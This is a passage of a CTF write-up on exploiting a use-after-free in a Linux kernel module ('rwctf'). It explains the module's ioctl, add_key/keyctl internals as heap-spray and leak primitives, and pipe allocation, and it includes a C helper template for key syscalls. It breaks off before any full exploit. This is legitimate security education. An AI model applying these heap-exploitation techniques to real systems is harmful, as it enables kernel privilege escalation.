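Almost every protection is enabled (SMEP and SMAP via -cpu, plus KASLR and KPTI on the kernel command line). There is a debugging problem, though: with hardware acceleration enabled (--enable-kvm), remote gdb debugging gets stuck on interrupts. Whenever gdb hits a breakpoint the kernel handles it, and when gdb resumes, the interrupt fires again (this is only my own understanding). So if you step with n/s you loop forever on the same line; if you set a breakpoint further on, execution does get there, but then exactly the same thing happens again, as shown below:

To fix this, on my Ubuntu 20.04 it was enough to turn hardware acceleration off (i.e. drop --enable-kvm).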

Next, the init script of the file system:

#!/bin/sh                                                    

mkdir /tmp
mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs none /dev
mount -t tmpfs none /tmp

exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

insmod /rwctf.ko
chmod 666 /dev/rwctf
chmod 700 /flag
chmod 400 /proc/kallsyms

echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

poweroff -d 120 -f &

echo -e "Boot took $(cut -d' ' -f1 /proc/uptime) seconds"
#setsid /bin/cttyhack setuidgid 0 /bin/sh
setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /sys
umount /tmp

poweroff -d 0 -f

It loads a module, rwctf.ko.

The module implements only the following functions:

rwmod_release	.text	        0000000000000000	00000007			R	.	.	.	.	.	.	.
rwmod_ioctl .text 0000000000000010 0000010D 00000038 R . . . . B . .
rwmod_open .text.unlikely 000000000000011D 00000013 R . . . . . . .
rwmod_init .init.text 0000000000000130 0000004F 00000008 R . . . . . . .
rwmod_exit .exit.text 000000000000017F 0000000C R . . . . . . .

The core of the challenge is rwmod_ioctl:

__int64 __fastcall rwmod_ioctl(__int64 a1, int a2, __int64 userarg)
{
__int64 v3; // r12
__int64 v5; // rbx
__int64 kmalloc_ptr; // rdi
unsigned int idx; // [rsp+0h] [rbp-30h] BYREF
unsigned int size; // [rsp+4h] [rbp-2Ch]
void *buffer; // [rsp+8h] [rbp-28h]
unsigned __int64 v10; // [rsp+18h] [rbp-18h]

v10 = __readgsqword(0x28u);
if ( !userarg )
return -1LL;
if ( a2 == 0xC0DECAFE )
{
if ( !copy_from_user(&idx, userarg, 16LL) && idx <= 1 )
kfree(buf[idx]);
return 0LL;
}
v3 = -1LL;
if ( a2 == 0xDEADBEEF )
{
if ( copy_from_user(&idx, userarg, 16LL) )
return 0LL;
v5 = idx;
if ( idx > 1 )
return 0LL;
buf[v5] = _kmalloc(size, 3520LL);
kmalloc_ptr = buf[idx];
if ( !kmalloc_ptr )
return 0LL;
if ( size > 0x7FFFFFFFuLL )
BUG();
if ( copy_from_user(kmalloc_ptr, buffer, size) )
return 0LL;
}
return v3;
}

The argument we pass is the following structure (copy_from_user reads 16 bytes):

userarg (0x10 bytes): idx (0x4) | size (0x4) | buffer (0x8)

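There are two commands (idx may only be 0 or 1):

  1. 0xC0DECAFE: kfree()s buf[idx] but leaves the dangling pointer in place;

  2. 0xDEADBEEF: kmalloc()s a chunk of the size we pass, stores it in buf[idx] and copies our buffer into it.

So the module is full of UAF: buf[idx] is never cleared after kfree, so the same chunk can even be freed again through the stale pointer.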
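A user-space mirror of this argument block, as a sketch assuming x86-64. The command values come from the decompiled code; the RWCTF_* names, the struct name and the helper functions are hypothetical:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <sys/ioctl.h>

#define RWCTF_ADD  0xDEADBEEF  /* kmalloc(size) + copy_from_user(buffer) */
#define RWCTF_FREE 0xC0DECAFE  /* kfree(buf[idx]); pointer is not cleared */

/* The 16-byte block rwmod_ioctl copies from user space. */
struct rwctf_arg {
    uint32_t idx;     /* 0 or 1 */
    uint32_t size;
    void    *buffer;
};

static_assert(sizeof(struct rwctf_arg) == 16, "rwmod_ioctl copies 16 bytes");
static_assert(offsetof(struct rwctf_arg, buffer) == 8, "buffer at +8");

/* fd is assumed to be an open descriptor on /dev/rwctf. */
int rwctf_add(int fd, uint32_t idx, uint32_t size, void *data)
{
    struct rwctf_arg a = { .idx = idx, .size = size, .buffer = data };
    return ioctl(fd, RWCTF_ADD, &a);
}

int rwctf_free(int fd, uint32_t idx)
{
    struct rwctf_arg a = { .idx = idx };
    return ioctl(fd, RWCTF_FREE, &a);
}
```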

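2. add_key basics

The kernel has a key management facility. The keyctl system call provides the interface for reading, modifying, revoking keys and so on; here is the explanation from the Linux man page: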

NAME
keyctl - manipulate the kernel's key management facility

SYNOPSIS
#include <sys/types.h>
#include <keyutils.h>

long keyctl(int operation, ...)

/* For direct call via syscall(2): */
#include <asm/unistd.h>
#include <linux/keyctl.h>
#include <unistd.h>

long syscall(__NR_keyctl, int operation, __kernel_ulong_t arg2,
__kernel_ulong_t arg3, __kernel_ulong_t arg4,
__kernel_ulong_t arg5);

No glibc wrapper is provided for this system call; see NOTES.

DESCRIPTION
keyctl() allows user-space programs to perform key manipulation.

The operation performed by keyctl() is determined by the value of the operation argument. Each of these operations is wrapped by the libkeyutils library (provided by the keyutils package) into individual functions
(noted below) to permit the compiler to check types.

NOTES
No wrapper for this system call is provided in glibc. A wrapper is provided in the libkeyutils library. When employing the wrapper in that library, link with -lkeyutils. However, rather than using this system call
directly, you probably want to use the various library functions mentioned in the descriptions of individual operations above.

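From the description, keyctl exists so that user space can perform key operations. Note that glibc provides no wrapper for it: either link with -lkeyutils to use the libkeyutils wrapper, or invoke it directly via syscall(2).

So much for managing keys, but where do the keys come from? The kernel provides another system call, add_key(), to create them: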
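Since glibc has no wrapper, both system calls can also be invoked through syscall(2) without linking -lkeyutils. The sketch below assumes the kernel UAPI header <linux/keyctl.h> is installed (for KEY_SPEC_PROCESS_KEYRING, KEYCTL_READ and KEYCTL_REVOKE); the wrapper names are hypothetical. Container seccomp profiles often block these system calls, in which case the calls fail with an errno such as EPERM or ENOSYS.

```c
#include <errno.h>
#include <linux/keyctl.h>
#include <stddef.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Raw wrappers, so libkeyutils is not needed. */
long sys_add_key(const char *type, const char *desc,
                 const void *payload, size_t plen, int ringid)
{
    return syscall(__NR_add_key, type, desc, payload, plen, ringid);
}

long sys_keyctl(int op, unsigned long a2, unsigned long a3,
                unsigned long a4, unsigned long a5)
{
    return syscall(__NR_keyctl, op, a2, a3, a4, a5);
}

/* Creates a "user" key in the process keyring, reads its payload back into
 * out and revokes the key. Returns the payload length, or -1 with errno set. */
long add_and_read_user_key(const char *desc, const void *data, size_t len,
                           char *out, size_t outlen)
{
    long id = sys_add_key("user", desc, data, len, KEY_SPEC_PROCESS_KEYRING);
    if (id < 0)
        return -1;
    long n = sys_keyctl(KEYCTL_READ, (unsigned long)id,
                        (unsigned long)out, outlen, 0);
    sys_keyctl(KEYCTL_REVOKE, (unsigned long)id, 0, 0, 0);  /* clean up */
    return n;
}
```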

NAME
add_key - add a key to the kernel's key management facility

SYNOPSIS
#include <sys/types.h>
#include <keyutils.h>

key_serial_t add_key(const char *type, const char *description,
const void *payload, size_t plen,
key_serial_t keyring);

No glibc wrapper is provided for this system call; see NOTES.

DESCRIPTION
add_key() creates or updates a key of the given type and description, instantiates it with the payload of length plen, attaches it to the nominated keyring, and returns the key's serial number.

The key may be rejected if the provided data is in the wrong format or it is invalid in some other way.

If the destination keyring already contains a key that matches the specified type and description, then, if the key type supports it, that key will be updated rather than a new key being created; if not, a new key
(with a different ID) will be created and it will displace the link to the extant key from the keyring.

The destination keyring serial number may be that of a valid keyring for which the caller has write permission. Alternatively, it may be one of the following special keyring IDs:

KEY_SPEC_THREAD_KEYRING
This specifies the caller's thread-specific keyring (thread-keyring(7)).

KEY_SPEC_PROCESS_KEYRING
This specifies the caller's process-specific keyring (process-keyring(7)).

KEY_SPEC_SESSION_KEYRING
This specifies the caller's session-specific keyring (session-keyring(7)).

KEY_SPEC_USER_KEYRING
This specifies the caller's UID-specific keyring (user-keyring(7)).

KEY_SPEC_USER_SESSION_KEYRING
This specifies the caller's UID-session keyring (user-session-keyring(7)).

In short, add_key() either creates a new key or, if the keyring already holds a key with the same type and description and the type supports updating, updates that key. The result is linked into the destination keyring, which the caller must be able to write to (or which is one of the special IDs above), and its serial number is returned.

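A quick word on keyrings: a keyring is literally a ring of keys, like the one you hang your keys on, i.e. a collection of keys that makes them easy to organise. The kernel documentation describes the following three basic key types: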

(+) "keyring"

Keyrings are special keys that contain a list of other keys. Keyring
lists can be modified using various system calls. Keyrings should not
be given a payload when created.

(+) "user"

A key of this type has a description and a payload that are arbitrary
blobs of data. These can be created, updated and read by userspace,
and aren't intended for use by kernel services.

(+) "logon"

Like a "user" key, a "logon" key has a payload that is an arbitrary
blob of data. It is intended as a place to store secrets which are
accessible to the kernel but not to userspace programs.

The description can be arbitrary, but must be prefixed with a non-zero
length string that describes the key "subclass". The subclass is
separated from the rest of the description by a ':'. "logon" keys can
be created and updated from userspace, but the payload is only
readable from kernel space.

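To find where a system call is implemented:

  1. open include/linux/syscalls.h in the kernel source;
  2. find the system call there; a comment above it usually names the file that implements it;
  3. newer kernels define system calls with SYSCALL_DEFINE<x>(name, ...), older ones as functions such as sys_open().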
/*
* Extract the description of a new key from userspace and either add it as a
* new key to the specified keyring or update a matching key in that keyring.
*
* If the description is NULL or an empty string, the key type is asked to
* generate one from the payload.
*
* The keyring must be writable so that we can attach the key to it.
*
* If successful, the new key's serial number is returned, otherwise an error
* code is returned.
*/
SYSCALL_DEFINE5(add_key, const char __user *, _type,
const char __user *, _description,
const void __user *, _payload,
size_t, plen,
key_serial_t, ringid)
{
key_ref_t keyring_ref, key_ref;
char type[32], *description;
void *payload;
long ret;

ret = -EINVAL;
if (plen > 1024 * 1024 - 1)
goto error;

/* draw all the data into kernel space */
ret = key_get_type_from_user(type, _type, sizeof(type)); // copy the type string
if (ret < 0)
goto error;

description = NULL;
if (_description) {
description = strndup_user(_description, KEY_MAX_DESC_SIZE);
if (IS_ERR(description)) {
ret = PTR_ERR(description);
goto error;
}
if (!*description) {
kfree(description);
description = NULL;
} else if ((description[0] == '.') &&
(strncmp(type, "keyring", 7) == 0)) {
ret = -EPERM;
goto error2;
}
}

/* pull the payload in if one was supplied */
payload = NULL;

if (plen) {
ret = -ENOMEM;
payload = kvmalloc(plen, GFP_KERNEL);
if (!payload)
goto error2;

ret = -EFAULT;
if (copy_from_user(payload, _payload, plen) != 0)
goto error3;
}

/* find the target keyring (which must be writable) */
keyring_ref = lookup_user_key(ringid, KEY_LOOKUP_CREATE, KEY_NEED_WRITE);
if (IS_ERR(keyring_ref)) {
ret = PTR_ERR(keyring_ref);
goto error3;
}

/* create or update the requested key and add it to the target
* keyring */
key_ref = key_create_or_update(keyring_ref, type, description,
payload, plen, KEY_PERM_UNDEF,
KEY_ALLOC_IN_QUOTA);
if (!IS_ERR(key_ref)) {
ret = key_ref_to_ptr(key_ref)->serial;
key_ref_put(key_ref);
}
else {
ret = PTR_ERR(key_ref);
}

key_ref_put(keyring_ref);
error3:
kvfree_sensitive(payload, plen);
error2:
kfree(description);
error:
return ret;
}

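Below is a short analysis, noting each object that gets allocated.

object1, object2: the temporary description and the payload of plen bytes

  1. The user-supplied type is copied into a local variable in the kernel.
  2. strndup_user is called with KEY_MAX_DESC_SIZE (#define KEY_MAX_DESC_SIZE 4096). Its call chain ends in p = kmalloc_track_caller(len, GFP_USER | __GFP_NOWARN);, i.e. a kernel heap chunk is created to hold our _description. GFP_USER is GFP_KERNEL | __GFP_HARDWALL.
  3. If a payload is supplied, a chunk is allocated with kvmalloc and our user data is copied into it. kvmalloc combines kmalloc and vmalloc: it tries kmalloc first and falls back to vmalloc only if that fails, so for allocations below a page it can be treated as kmalloc.
  4. Both chunks are freed again at the end, with kvfree_sensitive and kfree respectively.

That is the big picture for this system call alone. At first sight it does not seem to help exploitation much, but we need to dig further: the system call goes on to call the following function: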

/* create or update the requested key and add it to the target
* keyring */
key_ref = key_create_or_update(keyring_ref, type, description,
payload, plen, KEY_PERM_UNDEF,
KEY_ALLOC_IN_QUOTA);

As the comment says, it creates or updates the requested key and adds it to our keyring. Following it, we find this call:

/*
* Create or potentially update a key. The combined logic behind
* key_create_or_update() and key_create()
*/
static key_ref_t __key_create_or_update(key_ref_t keyring_ref,
const char *type,
const char *description,
const void *payload,
size_t plen,
key_perm_t perm,
unsigned long flags,
bool allow_update)
{
struct keyring_index_key index_key = {
.description = description,
};
struct key_preparsed_payload prep;
struct assoc_array_edit *edit = NULL;
const struct cred *cred = current_cred();
struct key *keyring, *key = NULL;
key_ref_t key_ref;
int ret;
struct key_restriction *restrict_link = NULL;
...

/* allocate a new key */
key = key_alloc(index_key.type, index_key.description,
cred->fsuid, cred->fsgid, cred, perm, flags, NULL);
...
}

It calls key_alloc:

object3: allocating struct key

struct key *key_alloc(struct key_type *type, const char *desc,
kuid_t uid, kgid_t gid, const struct cred *cred,
key_perm_t perm, unsigned long flags,
struct key_restriction *restrict_link)
{
struct key_user *user = NULL;
struct key *key;
size_t desclen, quotalen;
int ret;
...

desclen = strlen(desc);
quotalen = desclen + 1 + type->def_datalen;

...

/* allocate and initialise the key and its description */
key = kmem_cache_zalloc(key_jar, GFP_KERNEL);
if (!key)
goto no_memory_2;

key->index_key.desc_len = desclen;
key->index_key.description = kmemdup(desc, desclen + 1, GFP_KERNEL);
...
}

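Here the key itself, i.e. our struct key, is allocated from key_jar, a global kmem_cache, with GFP_KERNEL plus __GFP_ZERO (kmem_cache_zalloc zeroes the object). The description length is stored in the key, and the description is duplicated with kmemdup, which roughly kmallocs a new chunk and then memcpy()s our description into it.

Now back to __key_create_or_update. Before it calls key_alloc, another chunk is allocated; here is the relevant part of the code: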

...
memset(&prep, 0, sizeof(prep));
prep.orig_description = description;
prep.data = payload;
prep.datalen = plen;
prep.quotalen = index_key.type->def_datalen;
prep.expiry = TIME64_MAX;
if (index_key.type->preparse) {
ret = index_key.type->preparse(&prep);
...

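This calls index_key.type->preparse(). How is type determined? Tracing the assignment shows that it comes from the type string we passed to add_key: a function walks a global kernel list looking for a matching type. Since we know the list's name, it is easy to find its initialisation function with a source browser, which shows the available types: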

/*
* Initialise the key management state.
*/
void __init key_init(void)
{
/* allocate a slab in which we can store keys */
key_jar = kmem_cache_create("key_jar", sizeof(struct key),
0, SLAB_HWCACHE_ALIGN|SLAB_PANIC, NULL);

/* add the special key types */
list_add_tail(&key_type_keyring.link, &key_types_list);
list_add_tail(&key_type_dead.link, &key_types_list);
list_add_tail(&key_type_user.link, &key_types_list);
list_add_tail(&key_type_logon.link, &key_types_list);

/* record the root user tracking */
rb_link_node(&root_key_user.node,
NULL,
&key_user_tree.rb_node);

rb_insert_color(&root_key_user.node,
&key_user_tree);
}

The list holds the four types above. We only care about the user type, which is defined as follows:

/*
* user defined keys take an arbitrary string as the description and an
* arbitrary blob of data as the payload
*/
struct key_type key_type_user = {
.name = "user",
.preparse = user_preparse,
.free_preparse = user_free_preparse,
.instantiate = generic_key_instantiate,
.update = user_update,
.revoke = user_revoke,
.destroy = user_destroy,
.describe = user_describe,
.read = user_read,
};

Back in __key_create_or_update, the call through .preparse therefore lands in user_preparse for a user key. Let us follow it:

object4: allocating user_key_payload

/*
* Preparse a user defined key payload
*/
int user_preparse(struct key_preparsed_payload *prep)
{
struct user_key_payload *upayload;
size_t datalen = prep->datalen;

if (datalen <= 0 || datalen > 32767 || !prep->data)
return -EINVAL;

upayload = kmalloc(sizeof(*upayload) + datalen, GFP_KERNEL);
if (!upayload)
return -ENOMEM;

/* attach the data */
prep->quotalen = datalen;
prep->payload.data[0] = upayload;
upayload->datalen = datalen;
memcpy(upayload->data, prep->data, datalen);
return 0;
}

The function is short. It allocates one chunk that holds a struct user_key_payload header followed by the plen bytes of payload we passed in. The header is defined as follows:

/*****************************************************************************/
/*
* the payload for a key of type "user" or "logon"
* - once filled in and attached to a key:
* - the payload struct is invariant may not be changed, only replaced
* - the payload must be read with RCU procedures or with the key semaphore
* held
* - the payload may only be replaced with the key semaphore write-locked
* - the key's data length is the size of the actual data, not including the
* payload wrapper
*/
struct user_key_payload {
struct rcu_head rcu; /* RCU destructor */
unsigned short datalen; /* length of this data */
char data[] __aligned(__alignof__(u64)); /* actual data */
};

Its rcu_head field is defined as:

#define rcu_head callback_head
struct callback_head {
struct callback_head *next;
void (*func)(struct callback_head *);
};

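So object4 holds a user_key_payload header followed by our payload data. The data starts 0x18 bytes into the object. rcu_head takes 0x10 bytes (two pointers) and datalen takes 2 bytes. The __aligned(__alignof__(u64)) attribute on data then pads the header up to the next 8-byte boundary.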

To sum up, the add_key system call goes through the following steps:

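  1. Allocate a temporary chunk, object1, for the description, sized to the description if one was given.
  2. Allocate a temporary chunk, object2, of plen bytes to hold the payload passed in.
  3. Allocate the user_key_payload chunk: a 0x18-byte header followed by the payload we supplied.
  4. Allocate struct key from the dedicated kmem_cache key_jar and return the key ID.
  5. Free the temporary chunks object1 and object2.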

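3. keyctl basics

We now know how to obtain a key through a system call, but how do we make use of it? This is where the keyctl system call comes in. The add_key man page already refers to it.

keyctl operates on the key identified by the key ID that add_key returned. The system call looks like this: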

/*
* The key control system call
*/
SYSCALL_DEFINE5(keyctl, int, option, unsigned long, arg2, unsigned long, arg3,
unsigned long, arg4, unsigned long, arg5)
{
switch (option) {
...

case KEYCTL_UPDATE:
return keyctl_update_key((key_serial_t) arg2,
(const void __user *) arg3,
(size_t) arg4);

case KEYCTL_REVOKE:
return keyctl_revoke_key((key_serial_t) arg2);

...

case KEYCTL_READ:
return keyctl_read_key((key_serial_t) arg2,
(char __user *) arg3,
(size_t) arg4);

case KEYCTL_UNLINK:
return keyctl_keyring_unlink((key_serial_t) arg2,
(key_serial_t) arg3);

...

default:
return -EOPNOTSUPP;
}
}

(1) KEYCTL_UPDATE

This option calls keyctl_update_key:

/*
* Update a key's data payload from the given data.
*
* The key must grant the caller Write permission and the key type must support
* updating for this to work. A negative key can be positively instantiated
* with this call.
*
* If successful, 0 will be returned. If the key type does not support
* updating, then -EOPNOTSUPP will be returned.
*/
long keyctl_update_key(key_serial_t id,
const void __user *_payload,
size_t plen)
{
key_ref_t key_ref;
void *payload;
long ret;

ret = -EINVAL;
if (plen > PAGE_SIZE)
goto error;

/* pull the payload in if one was supplied */
payload = NULL;
if (plen) {
ret = -ENOMEM;
payload = kvmalloc(plen, GFP_KERNEL); //allocate the temporary payload
if (!payload)
goto error;

ret = -EFAULT;
if (copy_from_user(payload, _payload, plen) != 0)
goto error2;
}

...

/* update the key */
ret = key_update(key_ref, payload, plen);

...

return ret;
}

The function first allocates a temporary chunk for the payload. It then hands that chunk to key_update, which does the real work:

/**
* key_update - Update a key's contents.
* @key_ref: The pointer (plus possession flag) to the key.
* @payload: The data to be used to update the key.
* @plen: The length of @payload.
*
* Attempt to update the contents of a key with the given payload data. The
* caller must be granted Write permission on the key. Negative keys can be
* instantiated by this method.
*
* Returns 0 on success, -EACCES if not permitted and -EOPNOTSUPP if the key
* type does not support updating. The key type may return other errors.
*/
int key_update(key_ref_t key_ref, const void *payload, size_t plen)
{
struct key_preparsed_payload prep;
struct key *key = key_ref_to_ptr(key_ref);
int ret;

key_check(key);

/* the key must be writable */
ret = key_permission(key_ref, KEY_NEED_WRITE);
if (ret < 0)
return ret;

/* attempt to update it if supported */
if (!key->type->update)
return -EOPNOTSUPP;

memset(&prep, 0, sizeof(prep));
prep.data = payload;
prep.datalen = plen;
prep.quotalen = key->type->def_datalen;
prep.expiry = TIME64_MAX;
if (key->type->preparse) {
ret = key->type->preparse(&prep); //as in the user_key_payload allocation above: stores a new user_key_payload in prep.payload
if (ret < 0)
goto error;
}

down_write(&key->sem);

ret = key->type->update(key, &prep);

...

}

Note the last call. After key->type->preparse(&prep), it calls key->type->update, which for user keys is user_update:

/*
* update a user defined key
* - the key's semaphore is write-locked
*/
int user_update(struct key *key, struct key_preparsed_payload *prep)
{
struct user_key_payload *zap = NULL;
int ret;

/* check the quota and attach the new data */
ret = key_payload_reserve(key, prep->datalen);
if (ret < 0)
return ret;

/* attach the new data, displacing the old */
key->expiry = prep->expiry;
if (key_is_positive(key))
zap = dereference_key_locked(key);
rcu_assign_keypointer(key, prep->payload.data[0]);
prep->payload.data[0] = NULL;

if (zap)
call_rcu(&zap->rcu, user_free_payload_rcu);
return ret;
}

#define rcu_assign_keypointer(KEY, PAYLOAD) \
do { \
rcu_assign_pointer((KEY)->payload.rcu_data0, (PAYLOAD)); \
} while (0)

#define rcu_assign_pointer(p, v) do { (p) = (v); } while (0)

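user_update assigns prep->payload.data[0], the newly allocated user_key_payload, to key->payload.rcu_data0, and this is what actually updates the key. It then clears the temporary pointer in prep. The old payload (zap) is freed via call_rcu().

To summarise the update operation:

  1. keyctl_update_key allocates a temporary object to hold the new payload, also plen bytes, and then calls key_update.
  2. key_update calls user_preparse (assuming the type is "user", here and below), which allocates a new user_key_payload. It then calls user_update, which swaps in the new payload pointer.
  3. Back in keyctl_update_key, the temporary payload is freed.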

(2) KEYCTL_REVOKE

This option calls keyctl_revoke_key, which revokes a key:

/*
* Revoke a key.
*
* The key must be grant the caller Write or Setattr permission for this to
* work. The key type should give up its quota claim when revoked. The key
* and any links to the key will be automatically garbage collected after a
* certain amount of time (/proc/sys/kernel/keys/gc_delay).
*
* Keys with KEY_FLAG_KEEP set should not be revoked.
*
* If successful, 0 is returned.
*/
long keyctl_revoke_key(key_serial_t id)
{
...
if (test_bit(KEY_FLAG_KEEP, &key->flags))
ret = -EPERM;
else
key_revoke(key);

key_ref_put(key_ref);
error:
return ret;
}

It calls key_revoke:


/**
* key_revoke - Revoke a key.
* @key: The key to be revoked.
*
* Mark a key as being revoked and ask the type to free up its resources. The
* revocation timeout is set and the key and all its links will be
* automatically garbage collected after key_gc_delay amount of time if they
* are not manually dealt with first.
*/
void key_revoke(struct key *key)
{

...
down_write_nested(&key->sem, 1);
if (!test_and_set_bit(KEY_FLAG_REVOKED, &key->flags)) {
notify_key(key, NOTIFY_KEY_REVOKED, 0);
if (key->type->revoke)
key->type->revoke(key);

...
}

key_revoke calls key->type->revoke(key), which for user keys is user_revoke:

/*
* dispose of the links from a revoked keyring
* - called with the key sem write-locked
*/
void user_revoke(struct key *key)
{
struct user_key_payload *upayload = user_key_payload_locked(key);

/* clear the quota */
key_payload_reserve(key, 0);

if (upayload) {
rcu_assign_keypointer(key, NULL); //clear the user_key_payload pointer stored in the key
call_rcu(&upayload->rcu, user_free_payload_rcu); //free the old user_key_payload via RCU
}
}

(3) KEYCTL_READ

This is where the leak comes from!

/*
* Read a key's payload.
*
* The key must either grant the caller Read permission, or it must grant the
* caller Search permission when searched for from the process keyrings.
*
* If successful, we place up to buflen bytes of data into the buffer, if one
* is provided, and return the amount of data that is available in the key,
* irrespective of how much we copied into the buffer.
*/
long keyctl_read_key(key_serial_t keyid, char __user *buffer, size_t buflen)
{
struct key *key;
key_ref_t key_ref;
long ret;
char *key_data = NULL;
size_t key_data_len;

...

key_data_len = (buflen <= PAGE_SIZE) ? buflen : 0;
for (;;) {
if (key_data_len) {
key_data = kvmalloc(key_data_len, GFP_KERNEL); //allocate a key_data_len-byte chunk
if (!key_data) {
ret = -ENOMEM;
goto key_put_out;
}
}

ret = __keyctl_read_key(key, key_data, key_data_len); //calls user_read, which copies the payload into key_data

/*
* Read methods will just return the required length without
* any copying if the provided length isn't large enough.
*/
if (ret <= 0 || ret > buflen)
break;

/*
* The key may change (unlikely) in between 2 consecutive
* __keyctl_read_key() calls. In this case, we reallocate
* a larger buffer and redo the key read when
* key_data_len < ret <= buflen.
*/
if (ret > key_data_len) {
if (unlikely(key_data))
kvfree_sensitive(key_data, key_data_len);
key_data_len = ret;
continue; /* Allocate buffer */
}

if (copy_to_user(buffer, key_data, ret))
ret = -EFAULT;
break;
}
kvfree_sensitive(key_data, key_data_len);

key_put_out:
key_put(key);
out:
return ret;
}

It calls user_read:

/*
* read the key data
* - the key's semaphore is read-locked
*/
long user_read(const struct key *key, char *buffer, size_t buflen)
{
const struct user_key_payload *upayload;
long ret;

upayload = user_key_payload_locked(key); //get the key's user_key_payload
ret = upayload->datalen;

/* we can return the data as is */
if (buffer && buflen > 0) {
if (buflen > upayload->datalen)
buflen = upayload->datalen;

memcpy(buffer, upayload->data, buflen);
}

return ret;
}

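In short, keyctl_read_key allocates a temporary chunk, and user_read copies the key's payload into it. The amount copied is bounded by both user_key_payload->datalen and buflen. keyctl_read_key then copy_to_user()s the data into our buffer and frees the temporary chunk. The return value is upayload->datalen. If that value exceeds buflen, nothing is copied to userspace at all.

KEYCTL_UNLINK removes a key from a keyring. There is not much to say about it: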

/*
* Unlink a key from a keyring.
*
* The keyring must grant the caller Write permission for this to work; the key
* itself need not grant the caller anything. If the last link to a key is
* removed then that key will be scheduled for destruction.
*
* Keys or keyrings with KEY_FLAG_KEEP set should not be unlinked.
*
* If successful, 0 will be returned.
*/
long keyctl_keyring_unlink(key_serial_t id, key_serial_t ringid)
{
key_ref_t keyring_ref, key_ref;
struct key *keyring, *key;
long ret;

keyring_ref = lookup_user_key(ringid, 0, KEY_NEED_WRITE);
if (IS_ERR(keyring_ref)) {
ret = PTR_ERR(keyring_ref);
goto error;
}

key_ref = lookup_user_key(id, KEY_LOOKUP_PARTIAL, KEY_NEED_UNLINK);
if (IS_ERR(key_ref)) {
ret = PTR_ERR(key_ref);
goto error2;
}

keyring = key_ref_to_ptr(keyring_ref);
key = key_ref_to_ptr(key_ref);
if (test_bit(KEY_FLAG_KEEP, &keyring->flags) &&
test_bit(KEY_FLAG_KEEP, &key->flags))
ret = -EPERM;
else
ret = key_unlink(keyring, key);

key_ref_put(key_ref);
error2:
key_ref_put(keyring_ref);
error:
return ret;
}

4. Template

Helper wrappers for working with user_key_payload:

#include <unistd.h>
#include <sys/syscall.h>

#define KEY_SPEC_PROCESS_KEYRING -2 /* - key ID for process-specific keyring */

/* keyctl commands */
#define KEYCTL_UPDATE 2 /* update a key */
#define KEYCTL_REVOKE 3 /* revoke a key */
#define KEYCTL_UNLINK 9 /* unlink a key from a keyring */
#define KEYCTL_READ 11 /* read a key or keyring's contents */

/* add a "user" key to the process keyring; returns the key ID */
int key_alloc(char* description, void* payload, size_t plen){
return syscall(__NR_add_key, "user", description, payload, plen, KEY_SPEC_PROCESS_KEYRING);
}
/* replace the payload: a new user_key_payload is allocated, the old one freed via RCU */
int key_update(int id, void* payload, size_t plen){
return syscall(__NR_keyctl, KEYCTL_UPDATE, id, payload, plen, 0);
}
/* revoke the key: its user_key_payload is freed via call_rcu() */
int key_revoke(int id){
return syscall(__NR_keyctl, KEYCTL_REVOKE, id, 0, 0, 0);
}
/* read the payload; returns datalen, and copies nothing if plen is too small */
int key_read(int id, void* payload, size_t plen){
return syscall(__NR_keyctl, KEYCTL_READ, id, payload, plen, 0);
}
/* unlink the key from the process keyring */
int key_unlink(int id){
return syscall(__NR_keyctl, KEYCTL_UNLINK, id, KEY_SPEC_PROCESS_KEYRING, 0, 0);
}

5. pipe basics

To continue the exploit we need one more kernel object: the pipe, which is created through a system call:

PIPE(2) Linux Programmer's Manual PIPE(2)

NAME
pipe, pipe2 - create pipe

SYNOPSIS
#include <unistd.h>

/* On Alpha, IA-64, MIPS, SuperH, and SPARC/SPARC64; see NOTES */
struct fd_pair {
long fd[2];
};
struct fd_pair pipe();

/* On all other architectures */
int pipe(int pipefd[2]);

#define _GNU_SOURCE /* See feature_test_macros(7) */
#include <fcntl.h> /* Obtain O_* constant definitions */
#include <unistd.h>

int pipe2(int pipefd[2], int flags);

DESCRIPTION
pipe() creates a pipe, a unidirectional data channel that can be used for interprocess communication. The array pipefd is used to return two file descriptors referring to the ends of the pipe. pipefd[0] refers to
the read end of the pipe. pipefd[1] refers to the write end of the pipe. Data written to the write end of the pipe is buffered by the kernel until it is read from the read end of the pipe. For further details, see
pipe(7).

If flags is 0, then pipe2() is the same as pipe(). The following values can be bitwise ORed in flags to obtain different behavior:

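The first thing pipes bring to mind is inter-process communication. So how does it work underneath: how can two processes exchange information? One option is to create a file and have both processes read and write it. That works, but going through the disk is cumbersome and slow. Instead, we can look to the kernel. Each process has its own user address space, but the kernel address space is shared. The kernel can therefore set aside a buffer that both processes can access. That gives them a communication channel, and this channel is the pipe.

Usage is documented in the Linux man page. Roughly, the kernel creates a pseudo inode. An inode normally represents a file and its operations, but this one is created from nothing and no file on disk is involved. The kernel then installs two file descriptors in the current process: pipefd[0] is always the read end and pipefd[1] is always the write end. pipe() creates an anonymous pipe, that is, one without a name in the filesystem.

Next, let us look at the source to find where it can be exploited.

The pipe system call is implemented in fs/pipe.c: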


/*
* sys_pipe() is the normal C calling standard for creating
* a pipe. It's not the way Unix traditionally does this, though.
*/
static int do_pipe2(int __user *fildes, int flags)
{
struct file *files[2];
int fd[2];
int error;

error = __do_pipe_flags(fd, files, flags);
if (!error) {
if (unlikely(copy_to_user(fildes, fd, sizeof(fd)))) {
fput(files[0]);
fput(files[1]);
put_unused_fd(fd[0]);
put_unused_fd(fd[1]);
error = -EFAULT;
} else {
fd_install(fd[0], files[0]);
fd_install(fd[1], files[1]);
}
}
return error;
}

SYSCALL_DEFINE2(pipe2, int __user *, fildes, int, flags)
{
return do_pipe2(fildes, flags);
}

SYSCALL_DEFINE1(pipe, int __user *, fildes)
{
return do_pipe2(fildes, 0);
}

There are two pipe system calls, pipe and pipe2. They differ only in the flags argument, and both end up in do_pipe2. The call chain is:

do_pipe2
  __do_pipe_flags
    create_pipe_files
      get_pipe_inode    //sets the pipe inode's fops to pipefifo_fops
        alloc_pipe_info
          kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT)
          kcalloc(pipe_bufs, sizeof(struct pipe_buffer), GFP_KERNEL_ACCOUNT)
struct pipe_inode_info *alloc_pipe_info(void)
{
struct pipe_inode_info *pipe;
unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
